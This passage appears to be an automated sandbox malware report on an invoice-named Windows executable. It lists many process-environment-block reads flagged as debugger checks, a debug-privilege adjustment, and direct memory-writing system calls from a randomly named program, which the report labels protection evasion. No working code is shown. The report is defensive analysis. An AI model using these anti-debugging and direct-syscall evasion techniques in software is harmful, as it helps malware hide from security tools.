            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010A0274 mov eax, dword ptr fs:[00000030h]2_2_010A0274
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010A0274 mov eax, dword ptr fs:[00000030h]2_2_010A0274
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010A0274 mov eax, dword ptr fs:[00000030h]2_2_010A0274
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01070283 mov eax, dword ptr fs:[00000030h]2_2_01070283
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01070283 mov eax, dword ptr fs:[00000030h]2_2_01070283
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01070283 mov eax, dword ptr fs:[00000030h]2_2_01070283
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102E284 mov eax, dword ptr fs:[00000030h]2_2_0102E284
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102E284 mov eax, dword ptr fs:[00000030h]2_2_0102E284
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010002A0 mov eax, dword ptr fs:[00000030h]2_2_010002A0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010002A0 mov eax, dword ptr fs:[00000030h]2_2_010002A0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010862A0 mov eax, dword ptr fs:[00000030h]2_2_010862A0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010862A0 mov ecx, dword ptr fs:[00000030h]2_2_010862A0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010862A0 mov eax, dword ptr fs:[00000030h]2_2_010862A0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010862A0 mov eax, dword ptr fs:[00000030h]2_2_010862A0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010862A0 mov eax, dword ptr fs:[00000030h]2_2_010862A0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010862A0 mov eax, dword ptr fs:[00000030h]2_2_010862A0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010002E1 mov eax, dword ptr fs:[00000030h]2_2_010002E1
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010002E1 mov eax, dword ptr fs:[00000030h]2_2_010002E1
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010002E1 mov eax, dword ptr fs:[00000030h]2_2_010002E1
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FEC310 mov ecx, dword ptr fs:[00000030h]2_2_00FEC310
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01086500 mov eax, dword ptr fs:[00000030h]2_2_01086500
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010C4500 mov eax, dword ptr fs:[00000030h]2_2_010C4500
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010C4500 mov eax, dword ptr fs:[00000030h]2_2_010C4500
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010C4500 mov eax, dword ptr fs:[00000030h]2_2_010C4500
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010C4500 mov eax, dword ptr fs:[00000030h]2_2_010C4500
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010C4500 mov eax, dword ptr fs:[00000030h]2_2_010C4500
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010C4500 mov eax, dword ptr fs:[00000030h]2_2_010C4500
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010C4500 mov eax, dword ptr fs:[00000030h]2_2_010C4500
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF04E5 mov ecx, dword ptr fs:[00000030h]2_2_00FF04E5
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000535 mov eax, dword ptr fs:[00000030h]2_2_01000535
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000535 mov eax, dword ptr fs:[00000030h]2_2_01000535
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000535 mov eax, dword ptr fs:[00000030h]2_2_01000535
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000535 mov eax, dword ptr fs:[00000030h]2_2_01000535
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000535 mov eax, dword ptr fs:[00000030h]2_2_01000535
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000535 mov eax, dword ptr fs:[00000030h]2_2_01000535
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101E53E mov eax, dword ptr fs:[00000030h]2_2_0101E53E
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101E53E mov eax, dword ptr fs:[00000030h]2_2_0101E53E
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101E53E mov eax, dword ptr fs:[00000030h]2_2_0101E53E
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101E53E mov eax, dword ptr fs:[00000030h]2_2_0101E53E
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101E53E mov eax, dword ptr fs:[00000030h]2_2_0101E53E
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF64AB mov eax, dword ptr fs:[00000030h]2_2_00FF64AB
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102656A mov eax, dword ptr fs:[00000030h]2_2_0102656A
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102656A mov eax, dword ptr fs:[00000030h]2_2_0102656A
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102656A mov eax, dword ptr fs:[00000030h]2_2_0102656A
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01024588 mov eax, dword ptr fs:[00000030h]2_2_01024588
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102E59C mov eax, dword ptr fs:[00000030h]2_2_0102E59C
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010705A7 mov eax, dword ptr fs:[00000030h]2_2_010705A7
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010705A7 mov eax, dword ptr fs:[00000030h]2_2_010705A7
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010705A7 mov eax, dword ptr fs:[00000030h]2_2_010705A7
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FE645D mov eax, dword ptr fs:[00000030h]2_2_00FE645D
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010145B1 mov eax, dword ptr fs:[00000030h]2_2_010145B1
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010145B1 mov eax, dword ptr fs:[00000030h]2_2_010145B1
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102E5CF mov eax, dword ptr fs:[00000030h]2_2_0102E5CF
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102E5CF mov eax, dword ptr fs:[00000030h]2_2_0102E5CF
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102A5D0 mov eax, dword ptr fs:[00000030h]2_2_0102A5D0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102A5D0 mov eax, dword ptr fs:[00000030h]2_2_0102A5D0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FEC427 mov eax, dword ptr fs:[00000030h]2_2_00FEC427
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FEE420 mov eax, dword ptr fs:[00000030h]2_2_00FEE420
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FEE420 mov eax, dword ptr fs:[00000030h]2_2_00FEE420
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FEE420 mov eax, dword ptr fs:[00000030h]2_2_00FEE420
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101E5E7 mov eax, dword ptr fs:[00000030h]2_2_0101E5E7
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101E5E7 mov eax, dword ptr fs:[00000030h]2_2_0101E5E7
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101E5E7 mov eax, dword ptr fs:[00000030h]2_2_0101E5E7
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101E5E7 mov eax, dword ptr fs:[00000030h]2_2_0101E5E7
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101E5E7 mov eax, dword ptr fs:[00000030h]2_2_0101E5E7
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101E5E7 mov eax, dword ptr fs:[00000030h]2_2_0101E5E7
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101E5E7 mov eax, dword ptr fs:[00000030h]2_2_0101E5E7
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101E5E7 mov eax, dword ptr fs:[00000030h]2_2_0101E5E7
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102C5ED mov eax, dword ptr fs:[00000030h]2_2_0102C5ED
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102C5ED mov eax, dword ptr fs:[00000030h]2_2_0102C5ED
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01028402 mov eax, dword ptr fs:[00000030h]2_2_01028402
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01028402 mov eax, dword ptr fs:[00000030h]2_2_01028402
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01028402 mov eax, dword ptr fs:[00000030h]2_2_01028402
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF25E0 mov eax, dword ptr fs:[00000030h]2_2_00FF25E0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01076420 mov eax, dword ptr fs:[00000030h]2_2_01076420
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01076420 mov eax, dword ptr fs:[00000030h]2_2_01076420
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01076420 mov eax, dword ptr fs:[00000030h]2_2_01076420
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01076420 mov eax, dword ptr fs:[00000030h]2_2_01076420
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01076420 mov eax, dword ptr fs:[00000030h]2_2_01076420
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01076420 mov eax, dword ptr fs:[00000030h]2_2_01076420
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01076420 mov eax, dword ptr fs:[00000030h]2_2_01076420
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF65D0 mov eax, dword ptr fs:[00000030h]2_2_00FF65D0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102E443 mov eax, dword ptr fs:[00000030h]2_2_0102E443
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102E443 mov eax, dword ptr fs:[00000030h]2_2_0102E443
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102E443 mov eax, dword ptr fs:[00000030h]2_2_0102E443
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102E443 mov eax, dword ptr fs:[00000030h]2_2_0102E443
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102E443 mov eax, dword ptr fs:[00000030h]2_2_0102E443
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102E443 mov eax, dword ptr fs:[00000030h]2_2_0102E443
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102E443 mov eax, dword ptr fs:[00000030h]2_2_0102E443
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102E443 mov eax, dword ptr fs:[00000030h]2_2_0102E443
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101245A mov eax, dword ptr fs:[00000030h]2_2_0101245A
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0107C460 mov ecx, dword ptr fs:[00000030h]2_2_0107C460
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101A470 mov eax, dword ptr fs:[00000030h]2_2_0101A470
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101A470 mov eax, dword ptr fs:[00000030h]2_2_0101A470
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101A470 mov eax, dword ptr fs:[00000030h]2_2_0101A470
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF2582 mov eax, dword ptr fs:[00000030h]2_2_00FF2582
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF2582 mov ecx, dword ptr fs:[00000030h]2_2_00FF2582
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF8550 mov eax, dword ptr fs:[00000030h]2_2_00FF8550
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF8550 mov eax, dword ptr fs:[00000030h]2_2_00FF8550
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010244B0 mov ecx, dword ptr fs:[00000030h]2_2_010244B0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0107A4B0 mov eax, dword ptr fs:[00000030h]2_2_0107A4B0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102C700 mov eax, dword ptr fs:[00000030h]2_2_0102C700
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01020710 mov eax, dword ptr fs:[00000030h]2_2_01020710
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102C720 mov eax, dword ptr fs:[00000030h]2_2_0102C720
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102C720 mov eax, dword ptr fs:[00000030h]2_2_0102C720
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0106C730 mov eax, dword ptr fs:[00000030h]2_2_0106C730
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102273C mov eax, dword ptr fs:[00000030h]2_2_0102273C
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102273C mov ecx, dword ptr fs:[00000030h]2_2_0102273C
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102273C mov eax, dword ptr fs:[00000030h]2_2_0102273C
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102674D mov esi, dword ptr fs:[00000030h]2_2_0102674D
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102674D mov eax, dword ptr fs:[00000030h]2_2_0102674D
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102674D mov eax, dword ptr fs:[00000030h]2_2_0102674D
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01074755 mov eax, dword ptr fs:[00000030h]2_2_01074755
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032750 mov eax, dword ptr fs:[00000030h]2_2_01032750
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032750 mov eax, dword ptr fs:[00000030h]2_2_01032750
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0107E75D mov eax, dword ptr fs:[00000030h]2_2_0107E75D
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF4690 mov eax, dword ptr fs:[00000030h]2_2_00FF4690
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF4690 mov eax, dword ptr fs:[00000030h]2_2_00FF4690
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000770 mov eax, dword ptr fs:[00000030h]2_2_01000770
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000770 mov eax, dword ptr fs:[00000030h]2_2_01000770
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000770 mov eax, dword ptr fs:[00000030h]2_2_01000770
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000770 mov eax, dword ptr fs:[00000030h]2_2_01000770
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000770 mov eax, dword ptr fs:[00000030h]2_2_01000770
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000770 mov eax, dword ptr fs:[00000030h]2_2_01000770
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000770 mov eax, dword ptr fs:[00000030h]2_2_01000770
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000770 mov eax, dword ptr fs:[00000030h]2_2_01000770
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000770 mov eax, dword ptr fs:[00000030h]2_2_01000770
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000770 mov eax, dword ptr fs:[00000030h]2_2_01000770
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000770 mov eax, dword ptr fs:[00000030h]2_2_01000770
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000770 mov eax, dword ptr fs:[00000030h]2_2_01000770
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0109678E mov eax, dword ptr fs:[00000030h]2_2_0109678E
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010707C3 mov eax, dword ptr fs:[00000030h]2_2_010707C3
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF262C mov eax, dword ptr fs:[00000030h]2_2_00FF262C
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0107E7E1 mov eax, dword ptr fs:[00000030h]2_2_0107E7E1
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010127ED mov eax, dword ptr fs:[00000030h]2_2_010127ED
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010127ED mov eax, dword ptr fs:[00000030h]2_2_010127ED
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010127ED mov eax, dword ptr fs:[00000030h]2_2_010127ED
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF47FB mov eax, dword ptr fs:[00000030h]2_2_00FF47FB
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF47FB mov eax, dword ptr fs:[00000030h]2_2_00FF47FB
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0100260B mov eax, dword ptr fs:[00000030h]2_2_0100260B
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0100260B mov eax, dword ptr fs:[00000030h]2_2_0100260B
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0100260B mov eax, dword ptr fs:[00000030h]2_2_0100260B
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0100260B mov eax, dword ptr fs:[00000030h]2_2_0100260B
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0100260B mov eax, dword ptr fs:[00000030h]2_2_0100260B
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0100260B mov eax, dword ptr fs:[00000030h]2_2_0100260B
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0100260B mov eax, dword ptr fs:[00000030h]2_2_0100260B
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0106E609 mov eax, dword ptr fs:[00000030h]2_2_0106E609
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032619 mov eax, dword ptr fs:[00000030h]2_2_01032619
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01026620 mov eax, dword ptr fs:[00000030h]2_2_01026620
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01028620 mov eax, dword ptr fs:[00000030h]2_2_01028620
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0100E627 mov eax, dword ptr fs:[00000030h]2_2_0100E627
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFC7C0 mov eax, dword ptr fs:[00000030h]2_2_00FFC7C0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0100C640 mov eax, dword ptr fs:[00000030h]2_2_0100C640
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF07AF mov eax, dword ptr fs:[00000030h]2_2_00FF07AF
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102A660 mov eax, dword ptr fs:[00000030h]2_2_0102A660
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102A660 mov eax, dword ptr fs:[00000030h]2_2_0102A660
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010B866E mov eax, dword ptr fs:[00000030h]2_2_010B866E
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010B866E mov eax, dword ptr fs:[00000030h]2_2_010B866E
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01022674 mov eax, dword ptr fs:[00000030h]2_2_01022674
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF8770 mov eax, dword ptr fs:[00000030h]2_2_00FF8770
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102C6A6 mov eax, dword ptr fs:[00000030h]2_2_0102C6A6
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF0750 mov eax, dword ptr fs:[00000030h]2_2_00FF0750
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010266B0 mov eax, dword ptr fs:[00000030h]2_2_010266B0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0102A6C7
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102A6C7 mov eax, dword ptr fs:[00000030h]2_2_0102A6C7
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF0710 mov eax, dword ptr fs:[00000030h]2_2_00FF0710
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0106E6F2 mov eax, dword ptr fs:[00000030h]2_2_0106E6F2
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0106E6F2 mov eax, dword ptr fs:[00000030h]2_2_0106E6F2
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0106E6F2 mov eax, dword ptr fs:[00000030h]2_2_0106E6F2
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0106E6F2 mov eax, dword ptr fs:[00000030h]2_2_0106E6F2
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010706F1 mov eax, dword ptr fs:[00000030h]2_2_010706F1
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010706F1 mov eax, dword ptr fs:[00000030h]2_2_010706F1
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0106E908 mov eax, dword ptr fs:[00000030h]2_2_0106E908
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0106E908 mov eax, dword ptr fs:[00000030h]2_2_0106E908
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0107C912 mov eax, dword ptr fs:[00000030h]2_2_0107C912
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0108892B mov eax, dword ptr fs:[00000030h]2_2_0108892B
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0107892A mov eax, dword ptr fs:[00000030h]2_2_0107892A
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01070946 mov eax, dword ptr fs:[00000030h]2_2_01070946
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01016962 mov eax, dword ptr fs:[00000030h]2_2_01016962
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01016962 mov eax, dword ptr fs:[00000030h]2_2_01016962
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01016962 mov eax, dword ptr fs:[00000030h]2_2_01016962
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
